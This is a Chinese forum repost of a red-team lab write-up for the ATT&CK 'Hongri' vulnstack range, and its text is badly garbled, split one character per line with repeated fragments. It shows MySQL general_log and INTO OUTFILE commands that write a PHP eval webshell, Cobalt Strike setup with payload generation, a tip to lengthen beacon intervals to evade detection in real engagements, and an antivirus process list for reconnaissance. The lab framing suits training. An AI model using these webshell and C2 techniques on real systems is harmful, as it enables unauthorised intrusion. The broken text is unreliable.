论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[18958] 2021-01-01_ATT&CK红日靶场实战演习心得笔记(一)
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-18
IOT
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-01-01_ATT&CK红日靶场实战演习心得笔记(一)
A
T
T
&
C
K
红
日
靶
场
实
战
演
习
心
得
笔
记
(
一
)
原
创
R
H
a
c
k
e
r
I
D
L
a
b
2
0
2
1
-
0
1
-
0
1
2
0
多
岁
了
,
我
考
虑
过
悍
马
,
也
看
过
野
马
,
还
想
过
宝
马
,
后
来
看
了
看
海
马
,
最
后
选
择
了
爱
玛
,
付
款
的
时
候
还
是
选
择
了
沙
琪
玛
点
击
上
方
点
击
上
方
蓝
字
蓝
字
关
注
我
们
关
注
我
们
元
旦
快
乐
元
旦
快
乐
元
旦
快
乐
元
旦
快
乐
0
1
内
网
结
构
及
靶
机
环
境
搭
建
内
网
结
构
及
靶
机
环
境
搭
建
本
次
漏
洞
复
现
环
境
涉
及
的
工
具
关
注
公
众
号
并
回
复
本
次
漏
洞
复
现
环
境
涉
及
的
工
具
关
注
公
众
号
并
回
复
“
A
T
T
&
C
K
1
_
元
旦
快
乐
元
旦
快
乐
”
即
可
获
得
!
但
后
门
未
知
,
请
自
行
即
可
获
得
!
但
后
门
未
知
,
请
自
行
检
测
,
另
外
只
能
用
于
内
部
靶
机
测
试
,
请
勿
非
法
使
用
,
后
果
自
负
。
检
测
,
另
外
只
能
用
于
内
部
靶
机
测
试
,
请
勿
非
法
使
用
,
后
果
自
负
。
名
称
名
称
服
务
器
服
务
器
系
统
系
统
网
卡
网
卡
V
M
1
W
e
b
服
务
器
w
i
n
d
o
w
s
7
x
6
4
N
A
T
:
1
9
2
.
1
6
8
.
2
1
3
.
1
3
0
主
机
:
1
9
2
.
1
6
8
.
5
2
.
1
3
7
V
M
2
域
成
员
w
i
n
2
k
3
M
e
t
a
s
p
l
o
i
t
a
b
l
e
主
机
:
1
9
2
.
1
6
8
.
5
2
.
1
4
1
V
M
3
域
控
服
务
器
w
i
n
d
o
w
s
s
e
r
v
e
r
2
0
0
8
R
2
x
6
4
主
机
:
1
9
2
.
1
6
8
.
5
2
.
1
3
8
注
:
以
上
靶
机
环
境
均
来
自
红
日
安
全
团
队
红
日
安
全
团
队
靶
机
下
载
地
址
:
靶
机
下
载
地
址
:
h
t
t
p
:
/
/
v
u
l
n
s
t
a
c
k
.
q
i
y
u
a
n
x
u
e
t
a
n
g
.
n
e
t
/
v
u
l
n
/
d
e
t
a
i
l
/
2
/
#
s
c
r
e
e
n
s
h
o
t
以
上
靶
机
所
有
统
一
密
码
为
:
以
上
靶
机
所
有
统
一
密
码
为
:
h
o
n
g
r
i
s
e
c
@
2
0
1
9
我
这
里
改
成
了
a
d
m
i
n
@
1
2
3
搭
建
环
境
注
意
事
项
搭
建
环
境
注
意
事
项
1
.
v
m
1
靶
机
需
要
自
己
去
启
动
p
h
p
s
t
u
d
y
,
默
认
是
没
有
开
启
的
,
这
里
我
当
时
还
卡
了
一
会
,
真
的
t
c
c
c
c
c
l
.
2
.
配
置
网
络
的
时
候
,
只
需
要
改
第
一
个
靶
机
也
就
是
v
m
1
(
w
i
n
d
o
w
s
7
的
)
,
新
加
一
个
外
网
环
境
的
网
卡
就
o
k
,
可
以
是
n
a
t
也
可
以
是
桥
接
,
另
外
一
个
必
须
得
是
仅
主
机
模
式
,
默
认
的
地
址
是
1
9
2
.
1
6
8
.
5
2
.
0
/
2
4
,
不
要
改
成
其
他
的
,
因
为
主
机
加
入
域
的
时
候
,
d
n
s
是
域
控
的
i
p
,
写
死
的
1
9
2
.
1
6
8
.
5
2
.
1
3
0
。
0
2
外
网
外
网
g
e
t
s
h
e
l
l
0
1
信
息
收
集
信
息
收
集
1
.
正
常
打
开
是
一
个
p
h
p
探
针
利
用
点
:
1
)
检
查
p
h
p
禁
用
了
哪
些
函
数
2
)
爆
破
数
据
库
密
码
2
.
目
录
扫
描
(
这
里
用
的
是
d
i
r
s
e
a
r
c
h
)
P
S
:
c
t
f
打
的
比
较
多
,
如
果
日
后
遇
到
其
他
服
务
器
有
墙
的
情
况
下
,
可
以
设
置
线
程
的
方
式
来
进
行
扫
描
(
d
i
r
s
e
a
r
c
h
.
p
y
-
u
u
r
l
-
e
*
-
-
t
i
m
e
o
u
t
=
2
-
t
1
-
x
4
0
0
,
4
0
3
,
4
0
4
,
5
0
0
,
5
0
3
,
4
2
9
)
具
体
细
节
不
一
一
描
述
,
综
上
所
述
:
综
上
所
述
:
I
P
地
址
:
1
9
2
.
1
6
8
.
2
1
3
.
1
3
0
主
机
信
息
:
W
i
n
d
o
w
s
N
T
S
T
U
1
6
.
1
b
u
i
l
d
7
6
0
1
(
W
i
n
d
o
w
s
7
B
u
s
i
n
e
s
s
E
d
i
t
i
o
n
S
e
r
v
i
c
e
P
a
c
k
1
)
i
5
8
6
服
务
器
解
析
引
擎
:
A
p
a
c
h
e
/
2
.
4
.
2
3
(
W
i
n
3
2
)
O
p
e
n
S
S
L
/
1
.
0
.
2
j
P
H
P
/
5
.
4
.
4
5
网
站
绝
对
路
径
:
C
:
/
p
h
p
S
t
u
d
y
/
W
W
W
被
禁
用
函
数
:
无
网
站
类
型
:
y
x
c
m
s
,
有
后
台
数
据
库
账
号
和
密
码
:
r
o
o
t
/
r
o
o
t
p
h
p
m
y
A
d
m
i
n
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
1
3
.
1
3
0
/
p
h
p
m
y
A
d
m
i
n
/
0
2
m
y
s
q
l
数
据
库
日
志
数
据
库
日
志
g
e
t
s
h
e
l
l
爆
破
拿
到
数
据
库
账
号
密
码
后
,
又
发
现
有
p
h
p
m
y
A
d
m
i
n
,
所
以
想
拿
到
s
h
e
l
l
就
有
很
多
办
法
了
。
最
常
见
的
就
是
但
是
这
里
是
行
不
通
,
所
以
可
以
通
过
m
y
s
q
l
版
本
>
5
.
0
这
一
特
性
来
g
e
t
s
h
e
l
l
,
因
为
m
y
s
q
l
5
.
0
以
上
会
创
建
日
志
文
件
,
可
以
通
过
修
改
日
志
的
保
存
路
径
来
g
e
t
s
h
e
l
l
操
作
步
骤
:
S
H
O
W
V
A
R
I
A
B
L
E
S
L
I
K
E
'
g
e
n
e
r
a
l
%
'
s
e
l
e
c
t
'
<
?
p
h
p
e
v
a
l
(
$
_
P
O
S
T
[
r
h
]
)
;
?
>
'
i
n
t
o
o
u
t
f
i
l
e
'
C
:
/
p
h
p
S
t
u
d
y
/
W
W
W
/
m
a
.
p
h
p
'
;
s
e
l
e
c
t
l
o
a
d
_
f
i
l
e
(
'
C
:
/
p
h
p
S
t
u
d
y
/
W
W
W
/
r
h
.
p
h
p
'
)
;
g
e
n
e
r
a
l
l
o
g
指
的
是
日
志
保
存
状
态
,
一
共
有
两
个
值
(
O
N
/
O
F
F
)
O
N
代
表
开
启
O
F
F
代
表
关
闭
。
g
e
n
e
r
a
l
l
o
g
f
i
l
e
指
的
是
日
志
的
保
存
路
径
。
(
上
面
显
示
的
是
我
已
经
改
好
的
,
默
认
的
是
O
F
F
,
且
路
径
不
在
w
e
b
目
录
下
,
应
该
是
在
数
据
库
的
目
录
下
)
然
后
:
1
.
开
启
日
志
存
储
2
.
修
改
日
志
保
存
路
径
3
.
这
是
为
了
让
数
据
库
记
录
我
们
输
入
的
语
句
,
从
而
写
入
木
马
4
.
然
后
直
接
用
蚁
剑
连
接
即
可
s
e
t
g
l
o
b
a
l
g
e
n
e
r
a
l
_
l
o
g
=
"
O
N
"
;
s
e
t
g
l
o
b
a
l
g
e
n
e
r
a
l
_
l
o
g
_
f
i
l
e
=
'
C
:
/
p
h
p
S
t
u
d
y
/
W
W
W
/
r
h
.
p
h
p
'
;
s
e
l
e
c
t
'
<
?
p
h
p
e
v
a
l
(
$
_
P
O
S
T
[
c
m
d
]
)
;
?
>
'
;
0
3
文
件
上
传
文
件
上
传
g
e
t
s
h
e
l
l
除
此
之
外
,
还
可
以
通
过
c
m
s
的
漏
洞
来
进
行
g
e
t
s
h
e
l
l
在
网
页
上
看
到
了
用
户
名
和
密
码
(
在
正
常
的
站
当
中
很
少
会
出
现
这
样
的
情
况
,
但
是
我
依
然
可
以
通
过
这
样
的
弱
口
令
去
尝
试
,
尤
其
是
一
些
旁
站
,
弱
口
令
是
最
容
易
入
手
的
一
个
环
节
)
登
陆
进
去
后
直
接
编
辑
对
应
的
p
h
p
文
件
,
然
后
找
到
对
应
的
文
件
即
可
g
e
t
s
h
e
l
l
,
这
里
靶
机
是
自
留
了
一
个
后
门
。
0
3
基
于
基
于
C
o
b
a
l
t
S
t
r
i
k
e
的
内
网
渗
透
的
内
网
渗
透
由
于
本
靶
机
全
部
都
是
w
i
n
d
o
w
s
环
境
,
而
且
均
没
有
使
用
杀
毒
软
件
,
所
以
用
c
o
b
a
l
t
s
t
r
i
k
e
是
最
佳
之
选
了
。
当
然
在
后
面
我
也
会
介
绍
其
他
的
几
种
用
法
~
~
~
首
先
开
启
服
务
端
,
这
里
也
可
以
通
过
用
s
c
r
e
e
n
命
令
来
后
台
运
行
客
户
端
看
个
人
情
况
,
有
些
人
下
载
没
有
去
编
译
客
户
端
,
所
以
需
要
使
用
下
面
的
命
令
打
开
:
j
a
v
a
-
D
f
i
l
e
.
e
n
c
o
d
i
n
g
=
U
T
F
-
8
-
j
a
v
a
a
g
e
n
t
:
C
o
b
a
l
t
S
t
r
i
k
e
C
N
.
j
a
r
-
X
X
:
P
a
r
a
l
l
e
l
G
C
T
h
r
e
a
d
s
=
4
-
X
X
:
+
A
g
g
r
e
s
s
i
v
e
H
e
a
p
-
X
X
:
+
U
s
e
P
a
r
a
l
l
e
l
G
C
-
j
a
r
c
o
b
a
l
t
s
t
r
i
k
e
.
j
a
r
1
.
首
先
利
用
c
s
监
听
一
个
端
口
2
.
生
成
一
个
w
i
n
d
o
w
s
6
4
位
的
木
马
,
因
靶
机
环
境
没
有
装
杀
毒
软
件
,
所
以
这
里
没
有
用
免
杀
马
,
后
续
文
章
将
会
具
体
介
绍
各
种
免
杀
马
3
.
生
成
的
木
马
放
到
w
i
n
7
虚
拟
机
中
运
行
即
可
获
取
s
h
e
l
l
,
可
以
发
现
是
管
理
员
权
限
。
(
注
:
拿
到
(
注
:
拿
到
s
h
e
l
l
后
一
定
要
设
置
心
跳
值
,
默
认
的
为
后
一
定
要
设
置
心
跳
值
,
默
认
的
为
6
0
秒
,
所
以
执
行
命
令
等
操
作
都
会
很
慢
,
做
实
验
的
话
设
置
秒
,
所
以
执
行
命
令
等
操
作
都
会
很
慢
,
做
实
验
的
话
设
置
0
或
者
或
者
1
就
行
。
但
平
就
行
。
但
平
时
实
战
中
尽
量
设
置
高
点
,
不
然
容
易
被
检
测
到
)
时
实
战
中
尽
量
设
置
高
点
,
不
然
容
易
被
检
测
到
)
4
.
拿
到
s
h
e
l
l
后
可
以
基
本
的
信
息
收
集
一
波
,
如
n
e
t
u
s
e
r
、
w
h
o
a
m
i
、
h
o
s
t
n
a
m
e
等
等
。
当
然
我
平
时
基
本
上
就
是
一
条
命
令
搞
定
-
s
y
s
t
e
m
i
n
f
o
,
基
本
上
一
条
命
令
就
能
一
目
了
然
。
(
小
知
识
:
如
果
嫌
看
的
麻
烦
,
几
条
命
令
可
以
快
速
的
知
道
操
作
系
统
和
版
本
:
系
统
中
文
:
系
统
英
文
:
查
询
系
统
体
系
架
构
:
e
c
h
o
%
P
R
O
C
E
S
S
O
R
_
A
R
C
H
I
T
E
C
T
U
R
E
%
查
询
已
安
装
的
软
件
及
版
本
信
息
:
w
m
i
c
p
r
o
d
u
c
t
g
e
t
n
a
m
e
,
v
e
r
s
i
o
n
)
s
y
s
t
e
m
i
n
f
o
|
f
i
n
d
s
t
r
/
B
/
C
:
"
O
S
名
称
"
/
C
:
"
O
S
版
本
"
s
y
s
t
e
m
i
n
f
o
|
f
i
n
d
s
t
r
/
B
/
C
:
"
O
S
N
a
m
e
"
/
C
:
"
O
S
V
e
r
s
i
o
n
"
5
.
其
次
就
是
看
系
统
进
程
,
一
般
主
要
都
是
为
了
查
看
有
没
有
一
些
杀
毒
软
件
,
这
里
是
没
有
,
也
不
详
细
介
绍
了
。
另
外
附
带
一
个
常
见
的
杀
软
进
程
表
:
进
程
名
进
程
名
软
件
软
件
3
6
0
s
d
.
e
x
e
3
6
0
杀
毒
3
6
0
t
r
a
y
.
e
x
e
3
6
0
实
时
保
护
Z
h
u
D
o
n
g
F
a
n
g
Y
u
.
e
x
e
3
6
0
主
动
防
御
K
S
a
f
e
T
r
a
y
.
e
x
e
金
山
卫
士
S
a
f
e
D
o
g
U
p
d
a
t
e
C
e
n
t
e
r
.
e
x
e
安
全
狗
M
c
A
f
e
e
M
c
S
h
i
e
l
d
.
e
x
e
e
g
u
i
.
e
x
e
N
O
D
3
2
A
V
P
.
e
x
e
卡
巴
斯
基
a
v
g
u
a
r
d
.
e
x
e
小
红
伞
b
d
a
g
e
n
t
.
e
x
e
B
i
t
D
e
f
e
n
d
e
r
Q
Q
P
C
R
T
P
.
e
x
e
Q
Q
电
脑
管
家
m
s
s
e
c
e
s
s
.
e
x
e
微
软
杀
毒
B
a
i
d
u
S
d
S
v
c
.
e
x
e
百
度
杀
软
r
f
w
m
a
i
n
.
e
x
e
瑞
星
防
火
墙
b
e
i
k
e
s
a
n
.
e
x
e
贝
壳
云
安
全
K
S
W
e
b
S
h
i
e
l
d
.
e
x
e
金
山
网
盾
V
3
S
v
c
.
e
x
e
安
博
士
V
3
r
e
m
u
p
d
.
e
x
e
熊
猫
卫
士
v
b
a
3
2
l
d
e
r
.
e
x
e
v
b
3
2
杀
毒
K
7
T
S
e
c
u
r
i
t
y
.
e
x
e
K
7
杀
毒
6
.
此
环
境
重
点
讲
的
还
是
域
,
所
以
还
是
重
点
提
下
域
环
境
的
收
集
。
那
什
么
是
域
呢
?
域
是
计
算
机
网
络
的
一
种
形
式
,
其
中
所
有
用
户
帐
户
,
计
算
机
,
打
印
机
和
其
他
安
全
主
体
都
在
位
于
称
为
域
控
制
器
的
一
个
或
多
个
中
央
计
算
机
集
群
上
的
中
央
数
据
库
中
注
册
。
身
份
验
证
在
域
控
制
器
上
进
行
。
在
域
中
使
用
计
算
机
的
每
个
人
都
会
收
到
一
个
唯
一
的
用
户
帐
户
,
然
后
可
以
为
该
帐
户
分
配
对
该
域
内
资
源
的
访
问
权
限
。
从
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
3
开
始
,
A
c
t
i
v
e
D
i
r
e
c
t
o
r
y
是
负
责
维
护
该
中
央
数
据
库
的
W
i
n
d
o
w
s
组
件
。
W
i
n
d
o
w
s
域
的
概
念
与
工
作
组
的
概
念
形
成
对
比
,
在
该
工
作
组
中
,
每
台
计
算
机
都
维
护
自
己
的
安
全
主
体
数
据
库
。
怎
么
确
定
拿
到
的
s
h
e
l
l
是
否
存
在
域
呢
?
1
)
使
用
n
e
t
c
o
n
f
i
g
w
o
r
k
s
t
a
t
i
o
n
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT